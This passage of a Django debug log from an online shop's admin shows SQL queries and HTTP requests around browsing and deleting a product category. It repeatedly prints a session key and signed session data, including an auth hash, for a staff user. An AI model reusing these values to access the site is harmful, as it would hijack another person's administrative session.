args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 21, 16, 777865, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:21:16] "GET /shop/category/2/change/ HTTP/1.0" 200 7358 DEBUG 2019-12-07 13:21:17,124 utils 32196 139885050582784 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:21:17.115458+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 21, 17, 115458, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:21:17,126 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:21:17] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:21:40,336 utils 32196 139885050582784 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:21:40.321501+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 21, 40, 321501, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:21:40,341 utils 32196 139885050582784 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:21:40,347 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 2; args=(2,) DEBUG 2019-12-07 13:21:40,352 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level", T2."id", T2."name", T2."parent_id", T2."image", T2."description", T2."slug", T2."lft", T2."rght", T2."tree_id", T2."level" FROM "shop_category" INNER JOIN "shop_category" T2 ON ("shop_category"."parent_id" = T2."id") WHERE "shop_category"."parent_id" IN (2); args=(2,) DEBUG 2019-12-07 13:21:40,360 utils 32196 139885050582784 (0.004) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated", "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_product" INNER JOIN "shop_category" ON ("shop_product"."category_id" = "shop_category"."id") WHERE "shop_product"."category_id" IN (2) ORDER BY "shop_product"."name" ASC; args=(2,) DEBUG 2019-12-07 13:21:40,402 utils 32196 139885050582784 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:21:40.400626+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 21, 40, 400626, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:21:40] "GET /shop/category/2/delete/ HTTP/1.0" 200 3159 [07/Dec/2019 13:21:40] "GET /static/admin/js/cancel.js HTTP/1.0" 200 409 DEBUG 2019-12-07 13:21:42,937 utils 32196 139885050582784 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:21:42.922407+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 21, 42, 922407, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:21:42,941 utils 32196 139885050582784 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:21:42,946 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 2; args=(2,) DEBUG 2019-12-07 13:21:42,951 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level", T2."id", T2."name", T2."parent_id", T2."image", T2."description", T2."slug", T2."lft", T2."rght", T2."tree_id", T2."level" FROM "shop_category" INNER JOIN "shop_category" T2 ON ("shop_category"."parent_id" = T2."id") WHERE "shop_category"."parent_id" IN (2); args=(2,) DEBUG 2019-12-07 13:21:42,958 utils 32196 139885050582784 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated", "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_product" INNER JOIN "shop_category" ON ("shop_product"."category_id" = "shop_category"."id") WHERE "shop_product"."category_id" IN (2) ORDER BY "shop_product"."name" ASC; args=(2,) DEBUG 2019-12-07 13:21:42,962 utils 32196 139885050582784 (0.002) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-07T13:21:42.959640+00:00'::timestamptz, 6, 8, '2', 'Ground Fire', 3, '') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 7, 13, 21, 42, 959640, tzinfo=), 6, 8, '2', 'Ground Fire', 3, '') DEBUG 2019-12-07 13:21:42,964 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 2; args=(2,) DEBUG 2019-12-07 13:21:42,966 utils 32196 139885050582784 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 3 THEN "lft" + -2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 3 THEN "rght" + -2 ELSE "rght" END WHERE "tree_id" = 3 AND ("lft" > 3 OR "rght" > 3); args=[3, -2, 3, -2, 3, 3, 3] DEBUG 2019-12-07 13:21:42,969 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" IN (2); args=(2,) DEBUG 2019-12-07 13:21:42,973 utils 32196 139885050582784 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."category_id" IN (2) ORDER BY "shop_product"."name" ASC; args=(2,) DEBUG 2019-12-07 13:21:42,975 utils 32196 139885050582784 (0.001) DELETE FROM "shop_category" WHERE "shop_category"."id" IN (2); args=(2,) [07/Dec/2019 13:21:42] "POST /shop/category/2/delete/ HTTP/1.0" 302 0 DEBUG 2019-12-07 13:21:43,280 utils 32196 139885050582784 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:21:43.270528+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 21, 43, 270528, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:21:43,283 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:21:43,286 utils 32196 139885050582784 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-07 13:21:43,287 utils 32196 139885050582784 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-07 13:21:43,293 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-07 13:21:43,395 utils 32196 139885050582784 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:21:43.393350+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 21, 43, 393350, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:21:43] "GET /shop/category/ HTTP/1.0" 200 6912 DEBUG 2019-12-07 13:21:43,728 utils 32196 139885050582784 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:21:43.717284+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 21, 43, 717284, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:21:43,731 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:21:43] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:21:48,392 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:21:48,397 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:21:48,400 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:21:48,405 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:21:48,408 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:21:48,412 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:21:48,416 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:21:48,420 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:21:48,424 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:21:48,428 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:21:48,432 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:21:48] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 13:21:48] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [07/Dec/2019 13:21:48] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [07/Dec/2019 13:21:48] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [07/Dec/2019 13:21:48] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [07/Dec/2019 13:21:48] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [07/Dec/2019 13:21:49] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 [07/Dec/2019 13:21:49] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [07/Dec/2019 13:21:49] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [07/Dec/2019 13:21:49] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 [07/Dec/2019 13:21:49] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [07/Dec/2019 13:22:46] "GET / HTTP/1.0" 302 0 [07/Dec/2019 13:27:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 13:30:24,253 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:30:24,259 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:30:24,262 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:30:24,265 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:30:24,269 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:30:24,273 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:30:24,276 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:30:24,280 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:30:24,284 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:30:24,288 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:30:24,292 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:30:24] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 13:30:24] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [07/Dec/2019 13:30:24] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 [07/Dec/2019 13:30:24] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [07/Dec/2019 13:30:24] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [07/Dec/2019 13:30:24] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [07/Dec/2019 13:30:24] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [07/Dec/2019 13:30:25] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [07/Dec/2019 13:30:25] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [07/Dec/2019 13:30:25] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [07/Dec/2019 13:30:25] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 DEBUG 2019-12-07 13:30:25,418 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:30:25,424 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:30:25,428 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:30:25,430 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:30:25,432 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:30:25,435 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:30:25,437 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:30:25,439 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:30:25,442 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:30:25,444 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, 